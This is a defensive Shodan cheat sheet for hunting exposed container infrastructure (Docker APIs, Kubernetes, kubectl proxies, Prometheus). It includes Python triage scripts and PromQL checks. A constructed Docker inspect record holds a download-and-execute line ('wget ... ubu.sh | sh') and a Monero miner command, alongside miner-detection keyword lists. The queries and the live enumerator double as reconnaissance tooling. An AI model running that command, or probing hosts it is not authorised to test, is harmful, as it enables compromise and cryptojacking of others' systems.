Prometheus Threat Hunting Shodan Cheat Sheet

Backup and proof needs for packetware prometheus article

[Big Balls Has Your Security Number. And a global “Black Box” network perfect for sending it anywhere in the world ](<./../Big-Balls-Has-Your-Security-Number.-And-a-global-Black-Box-network-perfect-for-sending-it-anywhere-in-the-world-.md> “Big Balls Has Your Security Number. And a global “Black Box” network perfect for sending it anywhere in the world ”)


# Kubernetes Container Forensic Shodan Threat Hunting Cheatsheet

**Container Infrastructure Discovery**

**Exposed Docker APIs**

```
"Docker-Distribution-Api-Version" port:5000
"Docker Registry HTTP API" port:5000
product:"Docker" port:2375,2376
"Server: Docker" "Api-Version" port:2375
```

An unauthenticated daemon answers `GET /version` on 2375 with HTTP 200 and `Api-Version:` / `Server: Docker/...` headers; that banner is the hit. 2376 is the TLS port and only matters if the daemon was started without client-certificate verification. The daemon has no authentication of its own, so a `401 Unauthorized` in a 2375 banner comes from a reverse proxy in front of it, not from Docker.

**Kubernetes API Servers**

```
port:6443 "kubernetes"
product:"Kubernetes" port:6443,8443,8080
ssl.cert.subject.cn:"kubernetes" port:6443
"kind":"Status" "system:anonymous" port:6443
```

Read the status code in the banner: with the default `--anonymous-auth=true`, an unauthenticated `GET /` gets a 403 with a JSON `Status` object naming `system:anonymous`; a 401 means anonymous auth is disabled; a 200 with a `{"paths":[...]}` listing means anonymous read access has been granted, or the legacy insecure port (8080) is open.

**Cilium Envoy Proxies**

```
"envoy" "cilium" port:9901
"server: envoy" "x-envoy-upstream-service-time"
product:"Envoy proxy" "cilium"
```

Port 9901 is the Envoy admin interface from the upstream examples; it serves `/config_dump`, `/clusters` and `/stats`, which list every upstream service the proxy fronts. Cilium's embedded Envoy should only be reachable from the node, so an admin port answering from the internet is a misconfiguration worth a ticket on its own. The `server: envoy` header on an ordinary HTTP banner only tells you traffic passes through Envoy somewhere, not that Cilium is involved.

**kubectl Proxy Detection**

```
port:8001 "paths" "/api/v1"
port:8001 "/apis" "/healthz"
```

`kubectl proxy` binds 127.0.0.1:8001 by default and only becomes visible when run with `--address=0.0.0.0 --accept-hosts='.*'`. The strings "kubectl proxy" never appear in its banner; what does appear is the apiserver root listing (`{"paths":["/api","/api/v1","/apis",...]}`), returned without credentials because the proxy attaches the operator's own kubeconfig to every request.

**VPN & Covert Channels**

**Tailscale Detection**

```
port:41641 tailscale
"tailscale0" port:9100
"100.64." tailscale
"fd7a:115c:a1e0" tailscale
```

41641/UDP is WireGuard-based and does not answer unauthenticated probes, so direct hits are rare. What Shodan does catch is leakage: a `tailscale0` device label in an exposed node_exporter, or CGNAT (`100.64.0.0/10`) and Tailscale ULA (`fd7a:115c:a1e0::/48`) addresses in exposed dashboards and configs.

**WireGuard/VPN Tunnels**

```
port:51820 wireguard
"wg0" port:9100
"WireGuard" "wg0"
```

WireGuard is silent to anything that does not present a valid handshake, so a raw 51820 scan returns nothing from the tunnel itself; hits come from management UIs on other ports or from a `wg0` interface leaked through metrics.

**Mining & Malicious Activity**

**Cryptocurrency Miners**

```
"monero" "mining" port:3333,4444,14444
"xmrig" "stratum"
"cryptonight" port:4444
"pool.supportxmr.com"
```

A compromised container is a pool client, not a server, so pool names rarely show up in the victim's own banners. They show up in the container `Cmd` of an exposed Docker API, or in exposed cAdvisor labels, which is where the pool-name strings above are actually found.

**Shodan-Aware Botnets**

```
"shodan" "docker" port:2375
"ubu.sh" "darwin" mining
"zoolu2" docker
```

**Monitoring Infrastructure**

**Prometheus Exporters**

```
http.title:"Prometheus Time Series Collection and Processing Server" port:9090
"node_exporter" port:9100
http.title:"cAdvisor" port:8080
"# HELP" "# TYPE" "/metrics"
```

An exposed Prometheus server is worse than an exposed exporter: `/api/v1/targets` lists every scraped host and `/api/v1/series` enumerates the whole label space, including container names, images and VPN interfaces.

**Grafana Dashboards**

```
http.title:"Grafana" port:3000
"Welcome to Grafana" port:3000
"grafana" port:3000
```

Check `/api/health` for the version and whether `/api/dashboards/home` answers without a session; if it does, anonymous access is enabled and the dashboards (and the data-source names behind them) are readable.

**Container Network Analysis**

**High Bandwidth Containers**

```
org:"DigitalOcean" port:2375 country:CA
city:"Montreal" docker
city:"Montreal" port:2375,6443,8001
```

Shodan has no bandwidth data; the `org:`/`country:`/`city:` filters only scope a search to a hosting footprint (`net:` expects a CIDR, not a city name). Actual transmit volumes have to come from exposed container metrics, below, or from the provider's flow data.

**Exposed Container Stats**

```
"container_network_transmit_bytes_total"
"container_start_time_seconds"
"tailscale0" "node_network_transmit_bytes_total"
```

**C2 Infrastructure Hunting**

**SSH Backdoors in Containers**

```
port:2222 "SSH-2.0"
"SSH-2.0" port:22 org:"DigitalOcean" city:"Montreal"
```

An SSH banner carries only the software version string; nothing in it says "container" or "root". Attribute an sshd to a container through an exposed Docker API (`HostConfig.PortBindings` with `22/tcp` published to a non-standard host port) or by comparing the banner with the host's own OpenSSH build.

**Proxy C2 Channels**

```
port:1080 "socks"
"HTTP/1.1 200 Connection established"
"server: envoy" "upstream"
```

**Specific IOCs from Analysis**

**Based on Container Data**

```
"bitnami/kubectl"
"registry.k8s.io/kube-apiserver:v1.31.2"
"cilium/cilium-envoy"
"10.0.8.190"
"montreal-core-1"
```

Image names, private addresses and internal hostnames are only searchable when something leaked them: an open Docker API listing, cAdvisor `image=` labels, or a Prometheus target list. A private IP such as 10.0.8.190 never appears as a scan target itself.

**Search Syntax Examples**

```bash
# Find container images leaked into exposed Docker API banners
shodan search --fields ip_str,port,org 'port:2375 "Server: Docker" "kubectl:latest"'

# Monitor for new instances: alerts watch netblocks, not search strings
shodan alert create "Container hosts" 203.0.113.0/24   # placeholder netblock
shodan alert triggers                                  # lists new_service, open_database, ...
shodan alert enable <ALERT_ID> new_service

# Geographic targeting
shodan search 'docker country:CA city:"Montreal"'

# SSL certificate hunting
shodan search 'ssl.cert.subject.cn:"kubernetes" port:6443'

# API endpoint discovery: anonymous root listing from kubectl proxy or an open apiserver
shodan search 'port:8001 "paths" "/api/v1"'

# Container escape vectors: privileged flags are not in the banner,
# they have to be read from the API itself (see the triage script below)
shodan search 'port:2375 "Server: Docker" "Api-Version"'

# Persistence (systemd units, cron) is a host artifact, not a banner; collect it on the box
```
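Shodan can tell you that a daemon on 2375 answered, but not what it runs. Whether a container is `privileged`, mounts the host root or the Docker socket, publishes 22/tcp (the SSH backdoor case above) or carries a miner command line is only visible through the Docker API itself. The following is an added example, not code from the original page or from the Docker project: it fetches `/containers/json` and `/containers/{id}/json` (real Docker API endpoints) from a host you are authorised to test and flags those conditions. The inspect records it runs against offline are constructed and trimmed to the fields examined; the download IP and pool hostname in them are placeholders modelled on the Zoolu2/`ubu.sh` indicators listed on this page.

```python
"""Verify an exposed Docker API and triage what it is running.

Added example, not code from the original page or the Docker project. The
HTTP endpoints (GET /version, /containers/json, /containers/{id}/json) are
Docker's real API; the inspect records used for the offline run are
constructed and trimmed to the fields examined, with documentation-range IPs.
"""
import http.client
import json

MINER_MARKERS = ("xmrig", "stratum", "supportxmr", "cryptonight", "minerd", "monero")
# Bind sources that hand the container the host: socket, root fs, /proc, /sys.
ESCAPE_SOURCES = ("/var/run/docker.sock", "/", "/proc", "/sys")


def fetch_json(host, port, path, timeout=5):
    """Unauthenticated GET against the daemon; None unless it answers 200 JSON."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        body = resp.read()
    finally:
        conn.close()
    return json.loads(body) if resp.status == 200 else None


def enumerate_host(host, port=2375):
    """Live path (only for hosts you are authorised to test): list, inspect, triage."""
    if fetch_json(host, port, "/version") is None:
        return []
    listing = fetch_json(host, port, "/containers/json?all=1") or []
    return [triage(fetch_json(host, port, "/containers/%s/json" % c["Id"]))
            for c in listing]


def triage(inspect):
    """(name, image, findings) for one /containers/{id}/json record."""
    cfg = inspect.get("Config") or {}
    hc = inspect.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append("privileged")
    if hc.get("PidMode") == "host":
        findings.append("host-pid")
    if hc.get("NetworkMode") == "host":
        findings.append("host-network")
    for bind in hc.get("Binds") or []:
        src = bind.split(":")[0]          # "host_path:container_path[:opts]"
        if src in ESCAPE_SOURCES:
            findings.append("host-mount:" + src)
    # A published 22/tcp is the sshd-in-a-container that port:22 queries cannot attribute.
    for cport, hosts in (hc.get("PortBindings") or {}).items():
        if cport == "22/tcp" and hosts:
            findings.append("ssh-published:" + hosts[0].get("HostPort", "?"))
    haystack = " ".join([cfg.get("Image") or ""] + (cfg.get("Cmd") or [])
                        + (cfg.get("Entrypoint") or [])).lower()
    hits = [m for m in MINER_MARKERS if m in haystack]
    if hits:
        findings.append("miner:" + ",".join(hits))
    return ((inspect.get("Name") or "").lstrip("/"), cfg.get("Image") or "", findings)


def triage_all(records):
    return [triage(r) for r in records]


# Constructed inspect records (not real data), trimmed to the fields triage() reads.
CONSTRUCTED_INSPECT = [
    {"Name": "/web",
     "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Privileged": False,
                    "Binds": ["/srv/www:/usr/share/nginx/html:ro"],
                    "PortBindings": {"80/tcp": [{"HostIp": "", "HostPort": "8080"}]}}},
    {"Name": "/zoolu2",
     "Config": {"Image": "alpine:latest",
                "Cmd": ["sh", "-c", "wget -qO- http://203.0.113.5/ubu.sh | sh; "
                                    "./xmrig -o pool.supportxmr.com:3333"]},
     "HostConfig": {"Privileged": True, "PidMode": "host",
                    "Binds": ["/:/host", "/var/run/docker.sock:/var/run/docker.sock"],
                    "PortBindings": {"22/tcp": [{"HostIp": "0.0.0.0", "HostPort": "2222"}]}}},
]

if __name__ == "__main__":
    for name, image, findings in triage_all(CONSTRUCTED_INSPECT):
        print(f"{name:10} {image:15} {', '.join(findings) or 'clean'}")
```

`enumerate_host("198.51.100.10")` runs the same triage live; the offline records exercise every branch so the output format is known before you point it at anything real.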

**Network Forensic Integration**

**Traffic Correlation**

```promql
# Cross-reference with container metrics: per-interface series above 100 KB/s
rate(container_network_transmit_bytes_total[5m]) > 100000

# Same threshold per container rather than per interface
sum by (name) (rate(container_network_transmit_bytes_total[5m])) > 100000

# VPN tunnel monitoring (node_exporter)
rate(node_network_transmit_bytes_total{device="tailscale0"}[5m])

# Anomaly detection: containers started in the last 24 h
container_start_time_seconds > (time() - 86400)
```
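The PromQL above needs a Prometheus that already scrapes the target. When all you have is an exposed `/metrics` endpoint found on Shodan, the same three checks can be run on two raw scrapes. The following is an added example, not code from the original page: it parses Prometheus exposition text, computes the per-series counter rate the way `rate(...[5m])` does (a drop is treated as a counter reset), and applies the 100 KB/s and 24 h thresholds. The two cAdvisor-style scrapes are constructed, 300 s apart, with made-up container names and values.

```python
"""Run the PromQL checks above against raw /metrics text, offline.

Added example, not code from the original page: it parses two constructed
cAdvisor-style scrapes in Prometheus exposition format, computes per-series
transmit rate the way rate(container_network_transmit_bytes_total[5m]) does,
and flags containers started inside the last 24 h.
"""
import re

# Constructed sample scrapes (not real data), taken 300 s apart.
SCRAPE_T0 = 1_700_000_000
SCRAPE_T1 = SCRAPE_T0 + 300
SCRAPE_0 = """\
# HELP container_network_transmit_bytes_total Cumulative count of bytes transmitted
# TYPE container_network_transmit_bytes_total counter
container_network_transmit_bytes_total{id="/docker/aaa",interface="eth0",name="miner"} 1.2e+09
container_network_transmit_bytes_total{id="/docker/bbb",interface="eth0",name="web"} 5e+07
container_network_transmit_bytes_total{id="/docker/bbb",interface="tailscale0",name="web"} 1e+06
# TYPE container_start_time_seconds gauge
container_start_time_seconds{id="/docker/aaa",name="miner"} 1699990000
container_start_time_seconds{id="/docker/bbb",name="web"} 1690000000
"""
SCRAPE_1 = """\
container_network_transmit_bytes_total{id="/docker/aaa",interface="eth0",name="miner"} 1.5e+09
container_network_transmit_bytes_total{id="/docker/bbb",interface="eth0",name="web"} 5.3e+07
container_network_transmit_bytes_total{id="/docker/bbb",interface="tailscale0",name="web"} 2e+06
container_start_time_seconds{id="/docker/aaa",name="miner"} 1699990000
container_start_time_seconds{id="/docker/bbb",name="web"} 1690000000
"""

SAMPLE_RE = re.compile(r'^([A-Za-z_:][A-Za-z0-9_:]*)(?:\{(.*)\})?\s+(\S+)')
LABEL_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')


def parse_exposition(text):
    """Map (metric, frozenset(label pairs)) -> float for one scrape.

    Skips comments and blank lines; an optional trailing timestamp is ignored.
    """
    series = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        m = SAMPLE_RE.match(line)
        if m:
            name, labels, value = m.groups()
            series[(name, frozenset(LABEL_RE.findall(labels or '')))] = float(value)
    return series


def label(key, name):
    return dict(key[1]).get(name)


def counter_rate(prev, cur, seconds, metric):
    """Per-second increase between two scrapes; a drop is treated as a counter reset."""
    rates = {}
    for key, now_v in cur.items():
        if key[0] == metric and key in prev:
            delta = now_v - prev[key]
            rates[key] = (now_v if delta < 0 else delta) / seconds
    return rates


def high_transmitters(prev, cur, seconds, threshold=100_000):
    """Container names whose tx rate on any interface exceeds threshold B/s."""
    r = counter_rate(prev, cur, seconds, 'container_network_transmit_bytes_total')
    return sorted({label(k, 'name') for k, v in r.items() if v > threshold})


def vpn_transmit_rates(prev, cur, seconds, device='tailscale0'):
    """tx rate per container on the VPN interface (the tailscale0 query above)."""
    r = counter_rate(prev, cur, seconds, 'container_network_transmit_bytes_total')
    return {label(k, 'name'): v for k, v in r.items() if label(k, 'interface') == device}


def recent_containers(cur, now, window=86_400):
    """Containers whose start time lies inside the window (default 24 h)."""
    return sorted(label(k, 'name') for k, v in cur.items()
                  if k[0] == 'container_start_time_seconds' and v > now - window)


if __name__ == '__main__':
    s0, s1 = parse_exposition(SCRAPE_0), parse_exposition(SCRAPE_1)
    secs = SCRAPE_T1 - SCRAPE_T0
    print('high tx:', high_transmitters(s0, s1, secs))
    print('via tailscale0:', vpn_transmit_rates(s0, s1, secs))
    print('started <24h:', recent_containers(s1, SCRAPE_T1))
```

Two scrapes five minutes apart are enough to reproduce a `rate(...[5m])` figure; for a live endpoint, replace the constructed strings with the bodies of two timed `GET /metrics` requests.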

**API Integration Script**

```python
import shodan

api = shodan.Shodan('YOUR_API_KEY')

# Exposed kubectl proxies: the apiserver root listing only appears without credentials
results = api.search('port:8001 "paths" "/api/v1"')
for result in results['matches']:
    print(f"Exposed kubectl proxy: {result['ip_str']}:{result['port']}")

# Shodan alerts are bound to a netblock, not to a search string;
# create one for the address space under assessment and attach a trigger.
alert = api.create_alert('Container hosts', '203.0.113.0/24')   # placeholder netblock
api.enable_alert_trigger(alert['id'], 'new_service')
```
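The script above prints every hit, but a Shodan match is not yet a finding: a 2375 banner may be an open daemon or a reverse proxy in front of one, and a 6443 banner may be an apiserver that refused `system:anonymous` or one that handed out its root listing. The following added example (not code from the original page or from the Shodan client) classifies results in the shape `api.search()['matches']` returns, records whether an exposed exporter leaks a `tailscale0` interface, and deduplicates by `ip:port`. The matches are constructed with documentation-range IPs; the banner strings are modelled on real daemon, apiserver, node_exporter and Grafana responses. Swap in `shodan.Shodan(KEY).search(QUERY)['matches']` for a live run.

```python
"""Triage of Shodan search results for exposed container infrastructure.

Added example, not code from the original page or the Shodan project. The
matches below are constructed to look like api.search() output (keys ip_str,
port, data, http.title) with documentation-range IPs.
"""
import re

CONSTRUCTED_MATCHES = [
    {"ip_str": "198.51.100.10", "port": 2375, "http": {},
     "data": "HTTP/1.1 200 OK\r\nApi-Version: 1.43\r\nServer: Docker/24.0.7 (linux)\r\n"
             "Content-Type: application/json\r\n\r\n[]"},
    {"ip_str": "198.51.100.11", "port": 6443, "http": {},
     "data": 'HTTP/1.1 403 Forbidden\r\nContent-Type: application/json\r\n\r\n'
             '{"kind":"Status","status":"Failure","reason":"Forbidden",'
             '"message":"forbidden: User \\"system:anonymous\\" cannot get path \\"/\\""}'},
    {"ip_str": "198.51.100.12", "port": 8001, "http": {},
     "data": 'HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n'
             '{"paths":["/api","/api/v1","/apis","/healthz","/metrics","/version"]}'},
    {"ip_str": "198.51.100.13", "port": 9100, "http": {},
     "data": "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
             "# HELP node_network_transmit_bytes_total Network device statistic\r\n"
             'node_network_transmit_bytes_total{device="tailscale0"} 4.2e+09'},
    {"ip_str": "198.51.100.14", "port": 3000, "http": {"title": "Grafana"},
     "data": "HTTP/1.1 302 Found\r\nLocation: /login\r\n\r\n"},
    {"ip_str": "198.51.100.10", "port": 2375, "http": {},   # duplicate of the first
     "data": "HTTP/1.1 200 OK\r\nApi-Version: 1.43\r\nServer: Docker/24.0.7 (linux)\r\n\r\n[]"},
]

STATUS_RE = re.compile(r"^HTTP/\d\.\d (\d{3})")


def http_status(data):
    m = STATUS_RE.match(data)
    return int(m.group(1)) if m else None


def classify(match):
    """Map a Shodan banner to a service label; None if it is nothing we hunt."""
    data = match.get("data", "")
    title = (match.get("http") or {}).get("title") or ""
    status = http_status(data)
    if "Docker-Distribution-Api-Version" in data:
        return "docker-registry"
    if "Server: Docker" in data and "Api-Version:" in data:
        # The daemon itself answered; 200 means unauthenticated control of the host.
        return "docker-api-open" if status == 200 else "docker-api"
    if '"kind":"Status"' in data and status in (401, 403):
        # kube-apiserver reached, but authn/RBAC refused the anonymous request.
        return "k8s-apiserver-authenticated"
    if '"paths"' in data and '"/api/v1"' in data and status == 200:
        # Root listing without credentials: kubectl proxy or anonymous read access.
        return "k8s-api-open"
    if "# HELP" in data or "# TYPE" in data:
        return "prometheus-metrics"
    if title.lower().startswith("grafana"):
        return "grafana"
    return None


def leaked_interface(data, device="tailscale0"):
    """True if exposed node_exporter/cAdvisor metrics name a VPN interface."""
    return f'device="{device}"' in data


def triage(matches):
    """Deduplicate by ip:port and keep only banners that classified."""
    seen = {}
    for m in matches:
        service = classify(m)
        if service is None:
            continue
        seen.setdefault((m["ip_str"], m["port"]),
                        (service, leaked_interface(m.get("data", ""))))
    return [(ip, port, svc, vpn) for (ip, port), (svc, vpn) in sorted(seen.items())]


if __name__ == "__main__":
    for ip, port, svc, vpn in triage(CONSTRUCTED_MATCHES):
        print(f"{ip}:{port} {svc}{' (tailscale0 leaked)' if vpn else ''}")
```

The ordering of the checks matters: the open-listing test runs before the generic `/metrics` test because an apiserver root listing also contains the string `/metrics`.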

**Detection Evasion Indicators**

These are not Shodan queries. Once a host is in scope, run them against the Prometheus that was scraping it and on the box itself.

**Monitoring System Tampering**

```promql
# An exporter that was scraped before has vanished from the target list
absent(up{job="node"})

# Exporter still configured but no longer answering
up == 0

# Prometheus or an exporter was restarted in the last hour (config wipe, binary swap)
changes(process_start_time_seconds[1h]) > 0
```

**Log Manipulation**

```bash
# Logging daemons stopped on the host
systemctl is-active rsyslog systemd-journald

# /var/log remounted read-only (shows "ro" in the options)
findmnt -T /var/log -no OPTIONS

# Container logging driver switched off ("none" means nothing is kept)
docker inspect --format '{{.HostConfig.LogConfig.Type}}' <container>
```

**Automation & Continuous Monitoring**

**Daily Scan Commands**

```bash
# Automated container hunting (each run writes <name>.json.gz)
shodan download --limit 1000 kubectl 'port:8001 "paths" "/api/v1"'
shodan download --limit 1000 docker-api 'port:2375 "Server: Docker"'
shodan download --limit 1000 k8s-api 'port:6443 "kubernetes"'

# Process results
shodan parse --fields ip_str,port,data kubectl.json.gz
```

**Alert Configuration**

```bash
# Alerts watch netblocks, not queries: register the address space under assessment,
# then attach triggers so Shodan notifies on new services and open data stores
shodan alert create "Container hosts" 203.0.113.0/24   # placeholder netblock
shodan alert triggers
shodan alert enable <ALERT_ID> new_service
shodan alert enable <ALERT_ID> open_database
shodan alert list
```

For query-style monitoring ("any new host matching `port:2375 "Server: Docker"`"), schedule the `shodan download` commands above and diff the `ip_str,port` columns between runs.

**Threat Intelligence Correlation**

Match discovered infrastructure against known threat actor TTPs:

- Cross-reference container images with malware databases

- Correlate IP addresses with botnet C2 infrastructure

- Validate certificates against threat intelligence feeds

- Monitor for domain generation algorithm patterns